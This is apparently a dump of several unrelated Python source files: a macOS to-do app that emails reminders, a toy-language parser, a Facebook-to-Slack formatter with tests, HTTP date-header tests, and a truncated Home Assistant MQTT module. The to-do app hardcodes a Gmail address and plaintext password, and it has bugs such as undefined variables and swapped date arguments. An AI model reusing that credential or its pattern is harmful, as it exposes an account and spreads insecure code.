bg='#CD3F5D',\n fg='#CD3F5D', borderless=1, width=25,\n highlightbackground='#CD3F5D',\n command=lambda: self.change_bg('#CD3F5D',\n \"black\"))\n self.colour_red.place(x=95, y=125)\n # Green background, black text\n self.colour_green = Button(self.root, font=\"15\",\n bg='#00AD92', fg='#00AD92',\n borderless=1,\n width=25,\n highlightbackground='#00AD92',\n command=lambda: self.change_bg(\n '#00AD92', \"black\"))\n self.colour_green.place(x=125, y=125)\n # Blue background, black text\n self.colour_blue = Button(self.root, font=\"15\",\n bg='#728EE3', fg='#728EE3',\n borderless=1,\n width=25,\n highlightbackground='#728EE3',\n 
command=lambda: self.change_bg(\n '#728EE3', \"black\"))\n self.colour_blue.place(x=155, y=125)\n\n # Email\n # Title name and colour - Email\n self.email_label = tk.Label(self.root, text=\"Email\",\n font=self.title_label_font,\n fg=self.data[\"text_colour\"],\n bg=self.data[\"bg_colour\"])\n self.email_label.place(x=30, y=190)\n # Email entry\n self.email_entry_var = tk.StringVar()\n self.email_entry_var.set(self.data[\"email\"])\n self.email_entry = Entry(self.root, textvariable=self.email_entry_var,\n width=32)\n self.email_entry.place(x=35, y=235)\n # Button which changes the set email\n self.change = Button(self.root, text=\"Change\", bg='#ffffff',\n fg='#000000', borderless=1,\n command=self.change_func)\n self.change.place(x=32, y=285)\n\n # Help\n # Title name and colour - Help\n self.instructions_label = tk.Label(self.root, text=\"Help\",\n font=self.title_label_font,\n fg=self.data[\"text_colour\"],\n bg=self.data[\"bg_colour\"])\n self.instructions_label.place(x=30, y=350)\n # Button which opens the instructions window\n self.instructions = Button(self.root, text=\"Instructions\",\n bg='#ffffff', fg='#000000', borderless=1,\n command=self.instructions_func)\n self.instructions.place(x=32, y=395)\n # Button which opens the requirements window\n self.requirements = Button(self.root, text=\"Requirements\",\n bg='#ffffff', fg='#000000', borderless=1,\n command=self.requirements_func)\n self.requirements.place(x=32, y=426)\n self.root.mainloop()\n\n # Changes the theme\n def change_bg(self, background, foreground):\n # Sets position in JSON file to refer to\n self.data[\"bg_colour\"] = background\n self.data[\"text_colour\"] = foreground\n # Writes to JSON file\n with open(\"data.json\", \"w\") as file:\n json.dump(self.data, file)\n messagebox.showinfo(\"Done!\", \"The theme has been altered\")\n self.settings()\n\n # Changes the email\n def change_func(self):\n playsound(\"/Users/vic/PycharmProjects/todo/audio/add.mp3\")\n # If the inputted email is valid\n if validate_email(self.email_entry_var.get()):\n # If the amount of tasks in the list is 0 (denoted by len),\n # proceed to change the email, otherwise, present an error\n # message\n if len(self.data[\"data\"]) == 0:\n self.data[\"email\"] = self.email_entry_var.get()\n with open(\"data.json\", \"w\") as file:\n json.dump(self.data, file)\n messagebox.showinfo(\"Done!\",\n \"Email changed to \" +\n self.email_entry_var.get())\n else:\n messagebox.showinfo(\"Error!\",\n \"Please to do not alter the email\"\n \" address when there are active\"\n \" tasks\")\n return\n else:\n messagebox.showinfo(\"Error!\", \"The email entered is invalid\")\n self.settings()\n\n # Email functionality\n def send_email(self):\n\n for i in self.data[\"data\"]:\n if bool(int(i[3])):\n year = \"20\" + i[2][-2] + i[2][-1]\n year = int(year)\n month = i[2][-5] + i[2][-4]\n month = int(month)\n day = i[2][0] + i[2][1]\n day = int(day)\n hour = i[1][0] + i[1][1]\n hour = int(hour)\n minute = i[1][-2] + i[1][-1]\n minute = int(minute)\n\n date_old = datetime.datetime(year, day, month, hour, minute,\n 00, 798408)\n\n try:\n if datetime.datetime.now() > date_old:\n # SMTP port number: 587\n self.smtp_session = smtplib.SMTP('smtp.gmail.com', 587)\n self.smtp_session.starttls()\n # Mailing address (email and password)\n self.smtp_session.login(\"mailtemp025@gmail.com\",\n \"Fluffy15010hi\")\n # Confirmation that email has been sent\n command = f'''\n osascript -e 'display notification \"\n {message}\" with title \"{title}\"'\n '''\n os.system(command)\n # 
Email message sent (f-string)\n # i[0] refers to the message i[1] refers to th time\n # i[2] refers to the date, i[3] refers to the\n # indicator\n self.message = f\"The task '{i[0]}' is due right now\"\n\n self.smtp_session.sendmail(\"mailtemp025@gmail.com\",\n self.data[\"email\"],\n self.message)\n\n self.smtp_session.quit()\n # Set the 1 to 0 in the data.json to indicate an email\n # has been sent\n i[3] = \"0\"\n with open(\"data.json\", \"w\") as file:\n json.dump(self.data, file)\n # needed to fix syntax issue with 'with'\n except:\n pass\n\n self.root.after(50, self.send_email)\n\n # Help menu\n # Instructions\n def instructions_func(self):\n messagebox.showinfo(\"Help\",\n \"Instructions \"\n \"\\n \\n 1. Input a task by specifying a title, \"\n \"date and time. To add a task, click the + button.\"\n \"\\n \\n 2. Once the set time is reached, \"\n \"an email will be sent. Click the delete button \"\n \"to then remove the task from the list.\"\n \"\\n \\n 3. Clicking the settings button will \"\n \"open up the preferences menu.\")\n\n # Requirements\n def requirements_func(self):\n messagebox.showinfo(\"Help\",\n \"Requirements \"\n \"\\n \\n 1. An email is required in order to input \"\n \"tasks.\"\n \"\\n \\n 2. This application uses 24 hour time for \"\n \"inputs.\"\n \"\\n \\n 3. An internet connection is needed for \"\n \"email capabilities to function.\"\n \"\\n \\n 4. MacOS is the only supported platform\")\n\n\nmain = ToDo()\nmain.home()\n","sub_path":"components/task functionality (6).py","file_name":"task functionality (6).py","file_ext":"py","file_size_in_byte":20755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"506737836","text":"# Wei Chen\n# 110926494\n# 4/5/19\nimport ply.lex as lex\nimport sys\nimport ply.yacc as yacc\n\n# debugging = True\ndebugging = False\n\n\ndef debug(s, t=\"\"):\n global debugging\n if debugging:\n print(s, t)\n\n\nclass Node:\n def __init__(self):\n self.value = -1\n\n def evaluate(self):\n return self.value\n\n def execute(self):\n return self.value\n\n\nclass BooleanNode(Node):\n def __init__(self, s):\n super().__init__()\n # debug(\"Boolean \")\n if s == 'True' or s == True:\n self.value = True\n else:\n self.value = False\n\n def negate(self):\n debug(\"BooleanNode negate:\", self.value)\n self.value = not self.value\n debug(\"BooleanNode negate:\", self.value)\n return self\n\n def evaluate(self):\n return self.value\n\n def execute(self):\n # print(str(self.value).lower())\n # return str(self.value).lower()\n return self.value\n\n\nclass StringNode(Node):\n def __init__(self, s):\n super().__init__()\n self.value = str(s)\n\n def get_element(self, index):\n if index < 0:\n raise Exception(\"string index cannot be negative\")\n return StringNode(self.value[index])\n\n def evaluate(self):\n return self.value\n\n def execute(self):\n return self.value\n\n def replace(self, param, param1):\n self.value = self.value.replace(param, param1)\n pass\n\n\nclass NumberNode(Node):\n def __init__(self, v):\n super().__init__()\n if '.' 
in v or 'e' in v:\n self.value = float(v)\n else:\n self.value = int(v)\n\n def evaluate(self):\n return self.value\n\n def execute(self):\n return self.value\n\n\nclass IntNode(NumberNode):\n def __init__(self, v):\n super().__init__(v)\n self.value = int(v)\n\n def evaluate(self):\n return self.value\n\n def execute(self):\n return self.value\n\n\nclass FloatNode(NumberNode):\n def __init__(self, v):\n super().__init__(v)\n self.value = float(v)\n\n def evaluate(self):\n return self.value\n\n def execute(self):\n return self.value\n\n\nclass UminusNode(Node):\n def __init__(self, v):\n super().__init__()\n # print(v,)\n self.value = -v.evaluate()\n\n def evaluate(self):\n return self.value\n\n\nclass ComparisonNode(BooleanNode):\n def __init__(self, comparator, v1, v2):\n super().__init__(False)\n self.comparator = comparator\n self.v1 = v1\n self.v2 = v2\n debug(\"ComparisonNode: compare= \", comparator)\n debug(\"ComparisonNode: v1= \", v1)\n debug(\"ComparisonNode: v2= \", v2)\n\n def evaluate(self):\n v1 = self.v1.evaluate()\n v2 = self.v2.evaluate()\n debug(\"ComparisonNode: v1= \", v1)\n debug(\"ComparisonNode: v2= \", v2)\n if isinstance(v1, bool) or isinstance(v2, bool):\n raise ValueError\n if not ((isinstance(v1, (int,float)) and isinstance(v2, (int,float))) or (isinstance(v1, str) and isinstance(v2, str))):\n raise ValueError\n try:\n if self.comparator == '<':\n self.value = v1 < v2\n elif self.comparator == '>':\n self.value = (v1 > v2)\n\n elif self.comparator == '<=':\n self.value = (v1 <= v2)\n elif self.comparator == '>=':\n self.value = (v1 >= v2)\n elif self.comparator == '==':\n self.value = (v1 == v2)\n elif self.comparator == '<>':\n self.value = (v1 < v2 or v1 > v2)\n\n return self.value\n except Exception:\n raise Exception(\"SEMANTIC ERROR\")\n\n def execute(self):\n self.evaluate()\n # print(\"compare execute\")\n return self.value\nclass BoolOpNode(BooleanNode):\n def __init__(self, comparator, v1, v2):\n super().__init__(False)\n self.comparator = comparator\n self.v1 = v1\n self.v2 = v2\n\n def evaluate(self):\n v1 = self.v1.evaluate()\n v2 = self.v2.evaluate()\n if not (isinstance(v1, bool) and isinstance(v2, bool)):\n raise ValueError\n try:\n if self.comparator == 'andalso':\n self.value = (v1 and v2)\n elif self.comparator == 'orelse':\n self.value = (v1 or v2)\n return self.value\n except Exception:\n raise ValueError(\"SEMANTIC ERROR\")\n\n def execute(self):\n self.evaluate()\n # print(\"compare execute\")\n return self.value\n\n\nclass BopNode(Node):\n def __init__(self, op, v1, v2):\n super().__init__()\n self.v1 = v1\n self.v2 = v2\n self.op = op\n self.value = 0\n\n def evaluate(self):\n v1 = self.v1.evaluate()\n v2 = self.v2.evaluate()\n if isinstance(v1, bool) or isinstance(v2, bool):\n raise ValueError\n try:\n if self.op == '+':\n self.value = v1 + v2\n elif self.op == '-':\n # if not isinstance(v1,int) or not isinstance(v2,int):\n # raise ValueError\n self.value = v1 - v2\n elif self.op == '*':\n self.value = v1 * v2\n\n elif self.op == '/':\n\n self.value = v1 / v2\n elif self.op == '**':\n self.value = v1 ** v2\n elif self.op == 'mod':\n if isinstance(v1, int) and isinstance(v2, int):\n self.value = v1 % v2\n else:\n raise ValueError\n elif self.op == 'div':\n if isinstance(v1, int) and isinstance(v2, int):\n self.value = v1 // v2\n else:\n raise ValueError\n\n debug(self.value)\n return self.value\n except Exception as e:\n debug(e)\n raise Exception(\"SEMANTIC ERROR\")\n\n def execute(self):\n debug(self.value)\n self.evaluate()\n return 
self.value\n\n\nclass ListNode(Node):\n def __init__(self, v=None):\n super().__init__()\n if v is None:\n self.value = []\n else:\n self.value = [v]\n\n def append(self, v):\n self.value.append(v)\n return self\n\n def cons(self, v):\n self.value.insert(0, v)\n return self\n\n def get_element(self, index):\n if index < 0:\n raise Exception(\"SEMANTIC ERROR\")\n return self.value[index]\n\n def evaluate(self):\n return [x.evaluate() for x in self.value]\n\n def execute(self):\n return [x.execute() for x in self.value]\n\n\nclass TupleNode(Node):\n def __init__(self, l):\n # TupleNode takes in a list and convert to tuple\n # Maybe takes a ListNode?\n super().__init__()\n self.value = tuple(l)\n\n def get_element(self, index):\n if index <= 0:\n raise Exception(\"SEMANTIC ERROR\")\n return self.value[index - 1]\n\n def evaluate(self):\n return tuple([x.evaluate() for x in self.value])\n\n def execute(self):\n return tuple([x.execute() for x in self.value])\n\n\ntokens = [\n 'NUMBER', 'INTEGER', 'REAL', 'STRING', 'BOOLEAN',\n 'PLUS', 'MINUS', 'TIMES', 'DIVIDE', 'POWER', 'MOD', 'DIV',\n 'LPAREN', 'RPAREN', 'LBRACKET', 'RBRACKET',\n 'COMMA', 'HASHTAG', 'SEMICOLON', 'IN', 'CONS',\n 'LES', 'GRT', 'LEQ', 'GEQ', 'EQUALEQUAL', 'LESORGRT',\n 'NOT', 'ANDALSO', 'ORELSE',\n ]\n\n# Tokens\nt_PLUS = r'\\+'\nt_MINUS = r'-'\nt_TIMES = r'\\*'\nt_DIVIDE = r'/'\nt_LPAREN = r'\\('\nt_RPAREN = r'\\)'\nt_LBRACKET = r'\\['\nt_RBRACKET = r'\\]'\nt_COMMA = r','\nt_SEMICOLON = r';'\nt_HASHTAG = r'[#]'\nt_POWER = r'\\*\\*'\nt_MOD = r'mod'\nt_DIV = r'div'\nt_IN = r'in'\nt_CONS = r'::'\nt_EQUALEQUAL = r'=='\nt_LES = r'<'\nt_GRT = r'>'\nt_LEQ = r'<='\nt_GEQ = r'>='\nt_LESORGRT = r'<>'\nt_NOT = r'not'\nt_ANDALSO = r'andalso'\nt_ORELSE = r'orelse'\n\n\ndef t_NUMBER(t):\n r'\\d*(\\d\\.|\\.\\d)\\d*([eE]-?\\d+)?|\\d+'\n try:\n t.value = NumberNode(t.value)\n debug(t.value.value)\n except ValueError:\n raise SyntaxError(\"SYNTAX ERROR_NUMBER\")\n # t.value = 0\n return t\n\n\ndef t_STRING(t):\n r'(\\'(\\\\\\n|\\\\\\\\|\\\\\\\"|\\\\\\'|\\\\\\t|[^\\\\\\'])*\\')|(\\\"(\\\\\\n|\\\\\\\\|\\\\\\\"|\\\\\\'|\\\\\\t|[^\\\\\\\"])*\\\")'\n\n try:\n debug(t.value[1:-1])\n # string = str(t.value.replace(\"\\\\\\\\\", \"\\\\\")\n # .replace('\\\\\\n', '\\n')\n # .replace('\\\\\\'', '\\'')\n # .replace('\\\\\\\"', '\\\"')\n # .replace('\\\\\\t', '\\t')\n # )\n\n t.value = StringNode(t.value[1:-1])\n except ValueError:\n raise SyntaxError(\"SYNTAX ERROR STR\")\n # t.value = ''\n debug(t)\n return t\n\n\ndef t_BOOLEAN(t):\n r'(True)|(False)'\n t.value = BooleanNode(t.value)\n return t\n\n\n# Ignored characters\nt_ignore = \" \\t\"\n\n\ndef t_error(t):\n raise SyntaxError(\"SYNTAX ERROR_token not found\")\n\n\n# Build the lexer\nlex.lex(debug = 0)\n\n# Parsing rules\nprecedence = (\n ('left', 'ORELSE'),\n ('left', 'ANDALSO'),\n ('left', 'NOT'),\n ('left', 'LES', 'GRT', 'LEQ', 'GEQ', 'EQUALEQUAL', 'LESORGRT'),\n ('right', 'CONS'),\n ('left', 'IN'),\n ('left', 'PLUS', 'MINUS'),\n ('left', 'TIMES', 'DIVIDE', 'MOD', 'DIV'),\n ('right', 'UMINUS'),\n ('right', 'POWER'),\n ('nonassoc', 'LBRACKET', 'RBRACKET'),\n ('left', 'HASHTAG'),\n ('nonassoc', 'LPAREN', 'RPAREN'),\n)\n\n\nclass PrintNode(Node):\n def __init__(self, v):\n super().__init__()\n if isinstance(v, str):\n v = \"'\" + v + \"'\"\n self.value = v\n\n def execute(self):\n # self.value = self.value.evaluate\n print(self.value)\n return self.value\n\ndef p_expression_statement(t):\n 'statement : expression SEMICOLON'\n debug(\"p_expression_statement:\", t[1])\n 
debug(\"p_expression_statement:\", t[1].value)\n debug(\"p_expression_statement:\", t[1].evaluate())\n t[0] = PrintNode(t[1].evaluate())\n\n # print(t[1])\n\n\ndef p_expression_group(t):\n 'expression : LPAREN expression RPAREN'\n # print(\"p_expression_group\")\n t[0] = t[2]\n\n\ndef p_expression_binop(t):\n '''expression : expression PLUS expression\n | expression MINUS expression\n | expression TIMES expression\n | expression DIVIDE expression\n | expression POWER expression\n | expression MOD expression\n | expression DIV expression'''\n debug(\"p_expression_binop\")\n # print(t[1].value)\n # print(t[3].value)\n t[0] = BopNode(t[2], t[1], t[3])\n debug(t[0])\n\n\ndef p_expression_elements(t):\n '''elements : elements COMMA expression\n | expression'''\n if len(t) > 2:\n t[1].append(t[3])\n t[0] = t[1]\n # print(\"p_expression_elements if\", t[0].execute())\n else:\n # print(\"p_expression_elements else\", )\n\n t[0] = ListNode(t[1])\n # print(t[0].execute())\n\n\ndef p_expression_tuple(t):\n '''tuple : LPAREN elements RPAREN\n | LPAREN RPAREN'''\n\n if len(t) > 3:\n t[0] = TupleNode(t[2].value) # t[2] = elements seperated by comma, ex. \"1,2,3\"\n else:\n t[0] = TupleNode([])\n\n\ndef p_expression_tuple_index(t):\n '''indexing : HASHTAG expression LPAREN expression RPAREN\n | HASHTAG expression expression '''\n # print(\"p_expression_tuple_index\")\n # print(t[2])\n index = t[2].evaluate()\n if isinstance(index, bool) or not isinstance(index, int):\n raise ValueError\n if len(t) > 4:\n t[0] = t[4].get_element(index)\n else:\n t[0] = t[3].get_element(index)\n\n\ndef p_expression_list(t):\n '''list : LBRACKET elements RBRACKET\n | LBRACKET RBRACKET'''\n debug(\"p_expression_list\")\n if len(t) > 3:\n # print(\"p_expression_list if\")\n t[0] = t[2]\n else:\n # print(\"p_expression_list else\")\n t[0] = ListNode()\n\n\ndef p_expression_list_index(t):\n 'indexing : expression LBRACKET expression RBRACKET'\n\n # print(t[3])\n index = t[3].evaluate()\n debug(\"p_expression_list_index\", index)\n if isinstance(index, bool) or not isinstance(index, int) or not isinstance(t[1], (ListNode, StringNode)):\n raise ValueError\n t[0] = t[1].get_element(index)\n\n\ndef p_expression_in(t):\n 'expression : expression IN expression'\n # t1 can be anything, when t3 is list\n # t1 must be str when t3 is str\n t3 = t[3].evaluate()\n t1 = t[1].evaluate()\n if isinstance(t3, list):\n condition = t1 in t3\n t[0] = BooleanNode(condition)\n elif isinstance(t3, str):\n if isinstance(t1, str):\n condition = t1 in t3\n t[0] = BooleanNode(condition)\n else:\n raise ValueError\n else:\n raise ValueError\n\n\ndef p_expression_cons(t):\n '''expression : expression CONS expression'''\n # t3 must be list\n # print(t[1])\n t[0] = t[3].cons(t[1])\n\n\ndef p_expression_comparison(t):\n \"\"\"expression : expression LES expression\n | expression GRT expression\n | expression LEQ expression\n | expression GEQ expression\n | expression EQUALEQUAL expression\n | expression LESORGRT expression\"\"\"\n # print(t[2])\n # print(t[1].value, t[1])\n # print(t[3].value, t[3])\n t[0] = ComparisonNode(t[2], t[1], t[3])\n # print(t[0].value, t[0])\n\ndef p_expression_bool_op(t):\n \"\"\"expression : expression ANDALSO expression\n | expression ORELSE expression\"\"\"\n # print(t[2])\n # print(t[1].value, t[1])\n # print(t[3].value, t[3])\n t[0] = BoolOpNode(t[2], t[1], t[3])\n # print(t[0].value, t[0])\n\ndef p_expression_not(t):\n 'expression : NOT expression'\n # FIXME: replace value with evaluate\n if not isinstance(t[2].evaluate(), 
bool):\n raise ValueError\n debug(\"p_expression_not: \", t[2].value)\n t[0] = BooleanNode(not t[2].evaluate())\n debug(\"p_expression_not: \", t[0].value)\n\n\ndef p_expression_uminus(t):\n 'expression : MINUS expression %prec UMINUS'\n t[0] = UminusNode(t[2])\n\n\ndef p_expression_factor(t):\n '''expression : factor\n | indexing'''\n\n t[0] = t[1]\n\n\ndef p_factor(t):\n '''factor : NUMBER\n | BOOLEAN\n | STRING\n | tuple\n | list'''\n debug(\"p_factor \", t[1])\n t[0] = t[1]\n\n\n# def p_expression_list_index(t):\n# 'expression : list LBRACKET expression RBRACKET'\n# t[0] = (t[1])[t[3]]\n\n\ndef p_error(t):\n raise SyntaxError(\"SYNTAX ERROR pattern not found \")\n # print(\"Syntax error at '%s'\" % t.value)\n\n\nyacc.yacc(debug = 0)\n\n\ndef test_one(input=\";\"):\n code = [input]\n # code = [\n # \"11==12 orelse 1>2;\"\n # '1/0;'\n # '-1;'\n # \"[1]::2::[4];\"\n # \"5mod2;\"\n # \"1 + 2.0 * 3.0;\"\n #\n # '1-2;'\n # \"3 div 2;\"\n # \"3 mod 2;\"\n # \"4 mod 2;\"\n # \"true;\"\n # \"'Hello\\\\\\n\\\\\\\\World';\"\n\n # ]\n\n ast = None\n try:\n # lex.input(code)\n # while True:\n # token = lex.token()\n # if not token: break\n # print(token)\n print(\">>>\", code[0])\n ast = yacc.parse(code[0])\n\n # print(ast)\n # print(eval(code))\n # assert ast.execute() == eval(code)\n except AssertionError:\n print(\"AssertionError\")\n except SyntaxError as err:\n # debug(\"err:\", err)\n print(\"SYNTAX ERROR\")\n\n except Exception as err:\n # print(\"err:\", err)\n print(\"SEMANTIC ERROR\")\n\n try:\n # print(ast.execute())\n ast.execute()\n debug(\"executed successfully\")\n except AssertionError:\n print(\"AssertionError\")\n except Exception as err:\n print(\"err:\", err)\n print(\"SEMANTIC ERROR\")\n\n\n# test_one(\"(1<2) andalso False;\")\n# print('------------')\n\n\ndef filecompare(fn1, fn2):\n f1 = open(fn1, \"r\")\n f2 = open(fn2, \"r\")\n for line1 in f1:\n\n for line2 in f2:\n line2 = line2.replace(\"false\", \"False\").replace(\"true\", \"True\")\n if line1.strip() == line2.strip():\n print(\"SAME\\n\")\n else:\n print(\"l1: '\", line1, \"'\")\n print(\"l2: '\", line2, \"'\")\n assert line1.strip() == line2.strip()\n break\n f1.close()\n f2.close()\n\n\ndef file_tests(i=1, j=41):\n for i in range(i, j):\n print(i, \":\")\n infile = \"./cases/input_{}.txt\".format(i)\n comparefile = \"./cases/output_{}.txt\".format(i)\n\n fd = open(infile, 'r')\n codes = []\n for line in fd:\n codes.append(line.strip())\n print(\"input:\", codes)\n\n # codes = [\n # \"('a','b');\",\n # \"(1,2);\",\n # \"1.2 - 1;\",\n # \"2.1 ** 2;\",\n # \"(1-2)------(1-2 );\",\n # \"2--2;\",\n # \"1-2;\",\n # \"2+0;\",\n # \"2/0;\",\n # \"100*22;\",\n # \"2 4;\",\n # # \"'Hello World'\"\n # ]\n outfile = \"./result.txt\"\n\n with open(outfile, 'w+') as outf:\n for code in codes:\n code = code.replace(\"and\", \"andalso\").replace('or', 'orelse').replace(\"false\", \"False\").replace(\"true\",\n \"True\").replace(\n '//', \"div\").replace(\"%\", \"mod\")\n print(code)\n try:\n # lex.input(code)\n # while True:\n # token = lex.token()\n # if not token:\n # break\n # print(token)\n\n ast = yacc.parse(code)\n debug(\"ast:\", ast)\n result = ast.execute()\n debug(\"result:\", result)\n outf.write(str(result))\n # print(comparefile)\n # assert ast.execute() == eval(code)\n except AssertionError:\n print(\"AssertionError\")\n except SyntaxError:\n print(\"SYNTAX ERROR\")\n\n except Exception as err:\n debug(err)\n print(\"SEMANTIC ERROR\")\n outf.write(\"SEMANTIC ERROR\\n\")\n filecompare(outfile, comparefile)\n\n\n# 
file_tests(1, 42)\n\nif len(sys.argv) != 2:\n sys.exit(\"invalid arguments\")\n\ninfile = sys.argv[1]\nfd = open(infile, 'r')\ncodes = []\nfor line in fd:\n codes.append(line.strip())\ndebug(codes)\n\nfor code in codes:\n if code == \"\":\n continue\n try:\n # lex.input(code)\n # while True:\n # token = lex.token()\n # if not token:\n # break\n # print(token)\n\n ast = yacc.parse(code)\n debug(\"ast:\", ast)\n result = ast.execute()\n debug(\"result:\", result)\n except SyntaxError as err:\n debug(err)\n print(\"SYNTAX ERROR\")\n\n except Exception as err:\n print(\"SEMANTIC ERROR\")\n","sub_path":"sbml3.py","file_name":"sbml3.py","file_ext":"py","file_size_in_byte":19122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"508395328","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport ConfigParser\nimport optparse\nimport unittest\nimport json\nimport sys\n\nsys.path.append('..')\nimport core\n\nfrom model import FacebookItem\n\n\nclass FacebookFormatter:\n def __init__(self, config_name):\n config = ConfigParser.SafeConfigParser()\n config.read(config_name)\n self._logger = core.get_logger('facebook', config_name)\n\n def _format_title(self, account):\n if '-' in account:\n return \" \".join(account.split(\"-\")[:-1])\n else:\n return account\n\n def _to_json(self, item):\n title = self._format_title(item.account)\n text = '<%s|*%s*>' % (item.account_url, title)\n if item.text is not None:\n text = '\\n'.join([text, item.text])\n if item.reposted_item is not None:\n if item.reposted_item.text is not None:\n fields = [\n {'value': item.reposted_item.text, 'short': False}\n ]\n else:\n fields = []\n\n title = self._format_title(item.reposted_item.account)\n attachment = {\n 'title': title,\n 'title_link': item.reposted_item.account_url,\n 'color': '#3E62A8',\n 'fields': fields\n }\n if item.reposted_item.media_url:\n attachment['image_url'] = item.reposted_item.media_url\n data = {'text': text, 'attachments': [attachment]}\n elif item.media_url is not None:\n attachment = {\n 'image_url': item.media_url,\n 'color': '#3E62A8',\n 'fields': []\n }\n data = {'text': text, 'attachments': [attachment]}\n else:\n data = {'text': text}\n return json.dumps(data)\n\n def format_item(self, item):\n result = None\n if item.text or item.media_url or item.reposted_item:\n result = self._to_json(item)\n return result\n\n\nclass FacebookFormatterTest(unittest.TestCase):\n def test_format(self):\n formatter = FacebookFormatter(FacebookFormatterTest._config_name)\n item = FacebookItem(\n account='Info-Blackeberg-256707544468893', \n account_url='https://sv-se.facebook.com/Info-Blackeberg-256707544468893', \n creation_date='Thu Feb 25, kl. 18:17', \n text=u'Lär känna din stadsdel', \n media_url=None\n )\n self.assertTrue(formatter.format_item(item) is not None)\n item = FacebookItem(\n account='Info-Blackeberg-256707544468893', \n account_url='https://sv-se.facebook.com/Info-Blackeberg-256707544468893', \n creation_date='Thu Feb 25, kl. 
18:17', \n text=None, \n media_url=None\n )\n self.assertTrue(formatter.format_item(item) is None)\n\nif __name__ == '__main__':\n parser = optparse.OptionParser()\n parser.add_option('--config-file', \n dest='config_name', \n default='staging.ini',\n help='unit test configuration file') \n\n options, args = parser.parse_args()\n FacebookFormatterTest._config_name = options.config_name\n sys.argv[1:] = args\n unittest.main()\n","sub_path":"slack/facebook/facebook_formatter.py","file_name":"facebook_formatter.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"637103470","text":"# -*- coding: utf-8 -*-\n\nimport datetime\n\nimport http_lazy_headers as hlh\n\nfrom . import utils\n\n\nclass DateTest(utils.FieldTestCase):\n\n field = hlh.Date\n\n def test_raw_values(self):\n self.assertFieldRawEqual(\n ['Tue, 15 Nov 1994 08:12:31 GMT'],\n (datetime.datetime(\n year=1994,\n month=11,\n day=15,\n hour=8,\n minute=12,\n second=31),))\n\n self.assertFieldRawEqual(\n ['Sunday, 06-Nov-94 08:49:37 GMT'],\n (datetime.datetime(\n year=1994,\n month=11,\n day=6,\n hour=8,\n minute=49,\n second=37),))\n\n self.assertFieldRawEqual(\n ['Sun Nov 6 08:49:37 1994'],\n (datetime.datetime(\n year=1994,\n month=11,\n day=6,\n hour=8,\n minute=49,\n second=37),))\n\n def test_str(self):\n self.assertFieldStrEqual(\n (datetime.datetime(\n year=1994,\n month=11,\n day=15,\n hour=8,\n minute=12,\n second=31),),\n 'date: Tue, 15 Nov 1994 08:12:31 GMT')\n\n def test_raw_empty(self):\n \"\"\"\n Should NOT allow empty raw value\n \"\"\"\n self.assertRaisesHeaderError([''])\n\n def test_empty(self):\n \"\"\"\n Should NOT allow empty value\n \"\"\"\n self.assertRaisesInternalError(())\n\n def test_raw_bad_values(self):\n \"\"\"\n Should not allow bad raw values\n \"\"\"\n self.assertRawOK(['Tue, 15 Nov 1994 08:12:31 GMT'])\n self.assertRaisesHeaderError(['Tue, 15 Nov'])\n self.assertRaisesHeaderError(['Sun, 15 Nov 1994 08:12:31 GMT'])\n self.assertRaisesHeaderError(['Tue, 15 Nov 1994 08:12:31 UTC'])\n self.assertRaisesHeaderError(['Tue, 15 Nov 1 08:12:31 UTC'])\n\n def test_bad_values(self):\n \"\"\"\n Should not allow bad values\n \"\"\"\n good_date = datetime.datetime(\n year=1994,\n month=11,\n day=15,\n hour=8,\n minute=12,\n second=31)\n self.assertOK([good_date])\n self.assertRaisesInternalError([1])\n self.assertRaisesInternalError(['foo'])\n self.assertRaisesInternalError([None])\n self.assertRaisesInternalError([good_date, good_date])\n","sub_path":"tests/tests_fields_/tests_date.py","file_name":"tests_date.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"373837353","text":"\"\"\"\nSupport for MQTT discovery.\n\nFor more details about this component, please refer to the documentation at\nhttps://home-assistant.io/components/mqtt/#discovery\n\"\"\"\nimport asyncio\nimport json\nimport logging\nimport re\n\nfrom homeassistant.components import mqtt\nfrom homeassistant.components.mqtt import CONF_STATE_TOPIC, ATTR_DISCOVERY_HASH\nfrom homeassistant.const import CONF_PLATFORM\nfrom homeassistant.helpers.discovery import async_load_platform\nfrom homeassistant.helpers.dispatcher import async_dispatcher_send\nfrom homeassistant.helpers.typing import HomeAssistantType\n\n_LOGGER = logging.getLogger(__name__)\n\nTOPIC_MATCHER = re.compile(\n r'(?P\\w+)/(?P\\w+)/'\n 
r'(?:(?P[a-zA-Z0-9_-]+)/)?(?P[a-zA-Z0-9_-]+)/config')\n\nSUPPORTED_COMPONENTS = [\n 'binary_sensor', 'camera', 'cover', 'fan',\n 'light', 'sensor', 'switch', 'lock', 'climate',\n 'alarm_control_panel']\n\nCONFIG_ENTRY_COMPONENTS = [\n 'binary_sensor',\n 'camera',\n 'cover',\n 'light',\n 'lock',\n 'sensor',\n 'switch',\n 'climate',\n 'alarm_control_panel',\n 'fan',\n]\n\nDEPRECATED_PLATFORM_TO_SCHEMA = {\n 'mqtt': 'basic',\n 'mqtt_json': 'json',\n 'mqtt_template': 'template',\n}\n\n\nALREADY_DISCOVERED = 'mqtt_discovered_components'\nDATA_CONFIG_ENTRY_LOCK = 'mqtt_config_entry_lock'\nCONFIG_ENTRY_IS_SETUP = 'mqtt_config_entry_is_setup'\nMQTT_DISCOVERY_UPDATED = 'mqtt_discovery_updated_{}'\nMQTT_DISCOVERY_NEW = 'mqtt_discovery_new_{}_{}'\n\nTOPIC_BASE = '~'\n\nABBREVIATIONS = {\n 'aux_cmd_t': 'aux_command_topic',\n 'aux_stat_tpl': 'aux_state_template',\n 'aux_stat_t': 'aux_state_topic',\n 'avty_t': 'availability_topic',\n 'away_mode_cmd_t': 'away_mode_command_topic',\n 'away_mode_stat_tpl': 'away_mode_state_template',\n 'away_mode_stat_t': 'away_mode_state_topic',\n 'bri_cmd_t': 'brightness_command_topic',\n 'bri_scl': 'brightness_scale',\n 'bri_stat_t': 'brightness_state_topic',\n 'bri_val_tpl': 'brightness_value_template',\n 'clr_temp_cmd_t': 'color_temp_command_topic',\n 'clr_temp_stat_t': 'color_temp_state_topic',\n 'clr_temp_val_tpl': 'color_temp_value_template',\n 'cmd_t': 